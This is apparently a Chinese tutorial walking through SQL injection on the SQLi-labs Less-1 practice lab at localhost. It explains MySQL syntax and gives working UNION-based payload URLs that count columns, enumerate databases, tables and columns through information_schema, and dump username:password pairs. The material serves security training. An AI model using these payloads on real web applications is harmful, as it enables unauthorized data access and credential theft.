目录
01 获取字段数 order by x 02 获取显示位 union select 1,2,3,4…… 03 获取数据库信息 version() , user() , @@datadir 04 获取当前数据库 database() , schema() , 05 获取所有数据库 06 获取数据库表 07 获取所有字段 08 获取数据
逻辑运算符: and 、 or 、 != 注意:!!! and :并且,前后两条语句必须全为真,才为真,否则为假。 如: 1=1 and 2=2 真 1=1 and 1=2 假 or :或者,前后两条语句一条为真,就为真。 != :不等于。
--+ 注释符 limit 0,1 从你表中的第一个数据开始,只读取一个 order by 排序,判断字段数量,也就是表的列数 union select 联合查询,连接前面语句,起着合并查询的作用 group_concat 合并多行数据到一行 version() 当前数据库版本 database() 当前数据库 @@datadir 数据库数据路径 @@version_compile_os 操作系统版本
http://127.0.0.1/sqli/Less-1/?id=1
http://127.0.0.1/sqli/Less-1/?id=1’
输入单引号 ‘ 出现报错信息
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 您的SQL语法有错误;请查看与您的MySQL服务器版本对应的手册,以了解要在第1行的“”1“”限制0,1“”附近使用的正确语法
可以看出1’被1"引用,所以对应的字符应该为"
进行and逻辑测试
http://127.0.0.1/sqli/Less-1/?id=1’ and 1=1 --+
http://127.0.0.1/sqli/Less-1/?id=1' order by 5 --+
报错为:Unknown column '5' in 'order clause'
“Order子句”中的未知列“%5”
从 5向下一词尝试,最终得到正确列数为3
http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select database()),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users‘ --+
9. 获取security.users表所有字段
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,':',password) from users --+
1. 功能:将多个字符串连接成一个字符串。
2. 语法: concat(str1, str2,...)
1. 功能:和 concat() 一样,将多个字符串连接成一个字符串,但是可以一次性指定
分隔符( concat_ws 就是 concat with separator )
2. 语法: concat_ws(separator, str1, str2, ...)
1. 功能:将 group by 产生的同一个分组中的值连接起来,返回一个字符串结果。
2. 语法: group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ]
[separator ' 分隔符 '] )